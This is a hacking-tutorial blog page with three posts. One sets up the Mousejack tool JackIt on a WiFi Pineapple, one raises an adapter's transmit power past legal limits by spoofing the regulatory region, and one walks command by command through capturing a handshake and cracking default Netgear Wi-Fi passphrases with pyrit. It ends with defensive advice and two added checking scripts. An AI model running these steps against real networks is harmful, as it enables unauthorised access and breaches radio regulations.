metalkey

Hacking tutorials + info

Mousejack on the WiFi Pineapple

June 15, 2018

The Mousejack attack is extremely useful for dropping payloads on machines that use vulnerable RF wireless devices, and after a bit of trial and error it was possible to get the Jackit exploit tool running on a WiFi Pineapple.
The commands to get things up and running are below.

Note: It is also possible to run Jackit on the Nano but it requires moving Python to an external SD card first.

root@pineapple:~$ opkg update
root@pineapple:~$ opkg install python-pip libusb-1.0 libusb-compat
root@pineapple:~$ pip install pyusb click six tabulate
...
Download jackit from https://github.com/Sliim/jackit/tree/openwrt-libusb
Modify jackit as per master...Sliim:openwrt-libusb (e.g. wget https://raw.githubusercontent.com/Sliim/jackit/4de42c5d9cdae2ed1009b8cd161101e88ab1c76a/jackit/lib/nrf24.py)
...
root@pineapple:~$ ./setup.py build
root@pineapple:~$ ./setup.py install

Jackit Github Page:
https://github.com/insecurityofthings/jackit

Tags: wifi

Increasing the Power Output of your Alfa AWUS036H

July 01, 2016 — metalkey

Warning: Check the laws in your region before adjusting the power output of your wifi adapter. Increasing the power above 20dBm can be a breach of regulations in some countries.

OS: Kali Linux

Checking the Current Power Output

In the example below, Tx-Power is set to the default value of 20dBm for the current locale.
How this value is determined is explained in depth at Linux Wireless (http://linuxwireless.org/en/developers/Regulatory/).

root@kali:~$ iwconfig

wlan0 IEEE 802.11bg ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off

Increasing the Output to 1-Watt (30dBm)

To increase the power output of the Alfa AWUS036H to 1-Watt (the manufacturer-specified maximum), you will need to change your locale to a region with different regulations (e.g. Belize – BZ) and set txpower manually.

root@kali:~$ ifconfig wlan0 down
root@kali:~$ iw reg set BZ
root@kali:~$ iwconfig wlan0 txpower 30
root@kali:~$ ifconfig wlan0 up
root@kali:~$ iwconfig

wlan0 IEEE 802.11bg ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=30 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off

We have successfully set txpower to 30dBm (1-Watt).
Higher values can also be set; detailed instructions are available at Null Byte (http://null-byte.wonderhowto.com/how-to/set-your-wi-fi-cards-tx-power-higher-than-30-dbm-0149606/).
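Because the regulatory warning above is easy to forget once the override is in place, a quick compliance check is handy. The script below is an added example, not part of the original post: it parses iwconfig-style output (a constructed sample modelled on the listings above) and reports any interface whose Tx-Power exceeds a chosen limit. The 20 dBm limit and the interface names are assumptions; on a live box you would pipe the real iwconfig output into the same function.

```shell
#!/bin/sh
# Added example, not from the original post: parse iwconfig-style output and
# report any interface whose Tx-Power exceeds a chosen regulatory limit.
# The 20 dBm limit and the interface listing below are assumptions/constructed.

# Constructed sample modelled on the iwconfig listings above: one adapter that
# has been raised to 30 dBm and one still at the 20 dBm default.
SAMPLE_IWCONFIG='wlan0     IEEE 802.11bg  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=30 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
wlan1     IEEE 802.11bgn  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off'

# first_txpower_dbm <iwconfig-output>: print the first Tx-Power value found, in dBm
first_txpower_dbm() {
    printf '%s\n' "$1" | sed -n 's/.*Tx-Power=\([0-9][0-9]*\) dBm.*/\1/p' | head -n 1
}

# check_txpower <iwconfig-output> <limit-dbm>: one line per interface,
# "<iface> <dbm> OK" or "<iface> <dbm> OVER". An interface block starts with an
# unindented line naming the device; its Tx-Power sits on an indented line below.
check_txpower() {
    printf '%s\n' "$1" | awk -v limit="$2" '
        /^[A-Za-z][A-Za-z0-9]* +IEEE/ { iface = $1 }
        match($0, /Tx-Power=[0-9]+ dBm/) {
            # strip the 9-char "Tx-Power=" prefix and the 4-char " dBm" suffix
            dbm = substr($0, RSTART + 9, RLENGTH - 13) + 0
            print iface, dbm, (dbm > limit ? "OVER" : "OK")
        }'
}

# count_over_limit <iwconfig-output> <limit-dbm>: number of interfaces over the limit
count_over_limit() {
    check_txpower "$1" "$2" | grep -c ' OVER$' || true
}

# Report on the constructed sample against the assumed 20 dBm limit.
check_txpower "$SAMPLE_IWCONFIG" 20
```

For a live check, replace the sample with `check_txpower "$(iwconfig 2>/dev/null)" 20`; anything reported as OVER is an adapter still running above the locale default after a session like the one above.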

Tags: wifi

Netgear Wireless Router Default Passphrase Vulnerability

July 01, 2016 — metalkey

OS: Debian 8

A vulnerability exists in the default passphrase for Netgear Wireless Routers. The default passphrase consists of two words followed by a three-digit number (http://support1.gearguy.com/useruploads/images/19915v3.PNG):
word1word2xxx

To exploit this vulnerability you will need “aircrack-ng”, “pyrit” and the wordlist containing all possible passphrases. Initially, I was going to generate the dictionary using /usr/share/dict/cracklib-small and “crunch”, but the Netgear dictionary is already available for download from ScriptKitty (http://www.scriptkitty.ca/index.php/wordlists/).

Installation of Required Software

Manual step-by-step instructions @ blackMORE Ops (http://www.blackmoreops.com/2014/03/13/install-nvidia-driver-kernel-module-cuda-and-pyrit-kali-linux/)

user@debian8:~$ sudo apt-get install aircrack-ng
user@debian8:~$ sudo apt-get install pyrit

Step 1 – Capturing the Handshake

Plug in your Alfa AWUS036H and capture the 4-way handshake.
Tutorial @ SecurityTube - http://www.securitytube.net/groups?operation=view&groupId=9

user@debian8:~$ airmon-ng start wlan0
user@debian8:~$ airodump-ng mon0
user@debian8:~$ airodump-ng -c 1 -w netgear.cap --bssid 00:11:22:33:44:55 mon0

Step 2 – Cracking the Capture

Confirm you have usable handshakes, then clean up the capture file and crack the passphrase.

user@debian8:~$ pyrit -r netgear.cap analyze
user@debian8:~$ pyrit -r netgear.cap -o stripped-netgear.cap strip
user@debian8:~$ pyrit -r stripped-netgear.cap -i adjective_noun_3d.txt -b 00:11:22:33:44:55 attack_passthrough
...
Parsing file 'stripped-netgear.cap' (1/1)...
Parsed 10 packets (10 802.11-packets), got 1 AP(s)
Tried 12235614 PMKs so far; 25683 PMKs per second.
The password is 'magicalsquash835'

Solution

Never use the default passphrase provided with your router and always use complex passwords that do not follow predictable patterns.
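To make that advice checkable, the script below is an added example, not part of the original post: a passphrase policy check that flags anything with the factory-default shape described above (lowercase words run together plus exactly three digits), and an exposure estimate using the 25683 PMKs per second observed in the pyrit run. The sample passphrases are constructed (the first is the page's cracked example) and the 5000 x 5000 wordlist sizes are assumptions, not the real dictionary's counts.

```shell
#!/bin/sh
# Added example, not from the original post: a passphrase check that flags the
# factory-default shape described above (two lowercase words run together plus a
# three-digit number), and an exposure estimate using the page's observed rate.
# Wordlist sizes below are assumptions, not measured values.

# matches_default_shape <passphrase>: exit 0 when the passphrase is all lowercase
# letters followed by exactly three digits, i.e. word1word2xxx
matches_default_shape() {
    printf '%s\n' "$1" | grep -Eq '^[a-z]+[0-9]{3}$'
}

# classify <passphrase>: print DEFAULT-SHAPE or OK
classify() {
    if matches_default_shape "$1"; then
        echo "DEFAULT-SHAPE"
    else
        echo "OK"
    fi
}

# flag_weak <newline-separated passphrases>: echo only those with the default shape
flag_weak() {
    printf '%s\n' "$1" | grep -E '^[a-z]+[0-9]{3}$' || true
}

# hours_to_exhaust <adjectives> <nouns> <pmks-per-second>: whole hours a single
# full pass over adjectives*nouns*1000 candidates takes at the given PMK rate
hours_to_exhaust() {
    echo $(( $1 * $2 * 1000 / $3 / 3600 ))
}

# Constructed sample passphrases (the first is the page's cracked example)
SAMPLE_PASSPHRASES='magicalsquash835
correcthorsebatterystaple
Tr0ub4dor&3
Purple-Kettle-9102
quietriver042'

flag_weak "$SAMPLE_PASSPHRASES"
# Assumed wordlist of 5000 adjectives x 5000 nouns at the 25683 PMK/s seen above
hours_to_exhaust 5000 5000 25683
```

The point of the estimate is that the default shape turns a nominally 16-character passphrase into a keyspace that a single GPU-class rate exhausts in days, which is why the fix is to leave the pattern entirely rather than to pick a different pair of words.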

Tags: wifi